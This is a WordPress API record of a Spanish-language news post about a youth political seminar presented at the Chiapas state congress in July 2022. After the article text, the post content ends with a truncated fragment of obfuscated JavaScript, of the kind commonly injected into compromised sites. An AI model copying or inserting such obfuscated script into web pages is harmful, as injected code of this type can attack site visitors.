{"id":3846,"date":"2022-07-23T03:08:07","date_gmt":"2022-07-23T03:08:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3846"},"modified":"2022-07-23T03:08:08","modified_gmt":"2022-07-23T03:08:08","slug":"presentan-proyecto-seminario-politico-relevo-generacional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3846","title":{"rendered":"Presentan proyecto: \u201cSeminario Pol\u00edtico Relevo Generacional\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220722-WA0048.jpg\" alt=\"\" class=\"wp-image-3847\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220722-WA0048.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220722-WA0048-300x158.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220722-WA0048-768x404.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 22 de julio de 2022.- En representaci\u00f3n de la diputada Mar\u00eda De los \u00c1ngeles Trejo Huerta, presidenta de la Mesa Directiva del Congreso del Estado, la diputada Flor Esponda Torres particip\u00f3 en la presentaci\u00f3n del \u201cproyecto Seminario Pol\u00edtico Relevo Generacional\u201d, donde se da voz a la juventud del pa\u00eds, y se generan proyectos y propuestas en beneficio social y que la C\u00e1mara federal, adopta para crear iniciativas de ley.Al presidir la reuni\u00f3n, como integrante de la Mesa Directiva, la diputada Flor Esponda Torres, sostuvo que hablar de relevo generacional, es hablar de la creaci\u00f3n de pol\u00edticas p\u00fablicas en favor de los j\u00f3venes, impulsadas, -desde luego-, por nuestro presidente Andr\u00e9s Manuel L\u00f3pez Obrador. Es hablar tambi\u00e9n de incentivar la cuota joven en los puestos de elecci\u00f3n popular y en la toma de decisiones para seguir integrando proyectos de desarrollo inclusivo.Al hacer uso de la palabra el diputado federal, Miguel Torruco Garza, expres\u00f3 que este movimiento naci\u00f3 para unir a la juventud mexicana en la vida p\u00fablica, aclar\u00f3 que el relevo generacional, no es hacer a un lado a los adultos, sino involucrar a todos.Amelia \u00c1lvarez Gordillo, fue nombrada como enlace del Seminario cap\u00edtulo Chiapas, y en su participaci\u00f3n extern\u00f3 que Chiapas es punta de lanza en juventud y pol\u00edtica, por eso este Congreso est\u00e1 en ese camino del desarrollo.La diputada Lina Nango Molina a\u00f1adi\u00f3 que era de agradecer a nombre de las juventudes, el que se est\u00e9 tomando en cuenta a Chiapas, y que sea la entidad el punto de inicio de este proyecto para todo el pa\u00eds, para dar voz a todos los sectores.En tanto, la diputada Carolina Zuarth Ramos, mencion\u00f3 sobre la importancia que tiene involucrar a la juventud, que presentan propuestas m\u00faltiples que van en torno a un mejor bienestar para la ciudadan\u00eda.La titular del Instituto de la Juventud en Chiapas, Getseman\u00ed Moreno Mart\u00ednez, asegur\u00f3 que los j\u00f3venes pueden avanzar y lograr una transformaci\u00f3n, puso como ejemplo el trabajo que se tiene en el Congreso como el Poder Ejecutivo de la entidad.Al encuentro parlamentario, asistieron los diputados: Cuauht\u00e9moc Manuel Hern\u00e1ndez G\u00f3mez y, Petrona De la Cruz Cruz, quienes por su parte se comprometieron a seguir dando voz a los j\u00f3venes e involucrarse con los temas del Parlamento Juvenil 2022.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 22 de julio de 2022.- En representaci\u00f3n de la diputada Mar\u00eda De los \u00c1ngeles Trejo Huerta, presidenta de la Mesa Directiva del Congreso del Estado, la diputada Flor Esponda Torres particip\u00f3 en la presentaci\u00f3n del \u201cproyecto Seminario Pol\u00edtico Relevo Generacional\u201d, donde se da voz a la juventud del pa\u00eds, y se generan proyectos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3847,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3846","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3846","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3846"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3846\/revisions"}],"predecessor-version":[{"id":3848,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3846\/revisions\/3848"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3847"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3846"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3846"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}